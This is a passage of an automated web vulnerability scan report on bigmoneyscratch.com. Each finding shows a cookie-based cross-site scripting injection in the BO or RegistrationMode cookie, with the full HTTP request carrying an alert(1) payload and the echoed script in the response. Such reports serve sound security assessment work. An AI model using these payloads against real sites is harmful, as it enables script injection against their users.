This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM13162"-alert(1)-"7dddb484a1; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM13162"-alert(1)-"7dddb484a1; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:57 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:57 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:57 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM13162"-alert(1)-"7dddb484a1";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.199. http://www.bigmoneyscratch.com/Affiliates.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Affiliates.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc676"-alert(1)-"4f238f33e1e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMdc676"-alert(1)-"4f238f33e1e; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:21 GMT; path=/
Set-Cookie: BO=FMdc676"-alert(1)-"4f238f33e1e; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:21 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:21 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:21 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:21 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMdc676"-alert(1)-"4f238f33e1e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.200. http://www.bigmoneyscratch.com/Affiliates.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Affiliates.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c517"-alert(1)-"53575243eb4 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM8c517"-alert(1)-"53575243eb4; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM8c517"-alert(1)-"53575243eb4; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:03 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:03 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:03 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM8c517"-alert(1)-"53575243eb4";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.201. http://www.bigmoneyscratch.com/ContactUsChat.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsChat.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fe90"-alert(1)-"a5c469a4e05 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM3fe90"-alert(1)-"a5c469a4e05; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:03 GMT; path=/
Set-Cookie: BO=FM3fe90"-alert(1)-"a5c469a4e05; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:03 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:03 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM3fe90"-alert(1)-"a5c469a4e05";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.202. http://www.bigmoneyscratch.com/ContactUsChat.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsChat.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f48"-alert(1)-"8fd67a2d6af was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMc5f48"-alert(1)-"8fd67a2d6af; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc5f48"-alert(1)-"8fd67a2d6af; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc5f48"-alert(1)-"8fd67a2d6af";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.203. http://www.bigmoneyscratch.com/ContactUsFax.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsFax.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dd51"-alert(1)-"212a00bea45 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM9dd51"-alert(1)-"212a00bea45; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:10 GMT; path=/
Set-Cookie: BO=FM9dd51"-alert(1)-"212a00bea45; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:10 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:10 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:10 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM9dd51"-alert(1)-"212a00bea45";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.204. http://www.bigmoneyscratch.com/ContactUsFax.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsFax.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8b11"-alert(1)-"244e82d6466 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMe8b11"-alert(1)-"244e82d6466; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMe8b11"-alert(1)-"244e82d6466; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:53 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:53 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:53 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:53 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMe8b11"-alert(1)-"244e82d6466";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.205. http://www.bigmoneyscratch.com/ContactUsMail.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a56fe"-alert(1)-"8aba95bd886 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMa56fe"-alert(1)-"8aba95bd886; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: BO=FMa56fe"-alert(1)-"8aba95bd886; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMa56fe"-alert(1)-"8aba95bd886";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.206. http://www.bigmoneyscratch.com/ContactUsMail.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4ff8"-alert(1)-"b6010eeb282 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMd4ff8"-alert(1)-"b6010eeb282; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMd4ff8"-alert(1)-"b6010eeb282; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:22 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:22 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:22 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMd4ff8"-alert(1)-"b6010eeb282";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.207. http://www.bigmoneyscratch.com/ContactUsTel.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsTel.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e206d"-alert(1)-"b6e9e7a7d18 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMe206d"-alert(1)-"b6e9e7a7d18; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:13 GMT; path=/
Set-Cookie: BO=FMe206d"-alert(1)-"b6e9e7a7d18; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:13 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:13 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe206d"-alert(1)-"b6e9e7a7d18";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
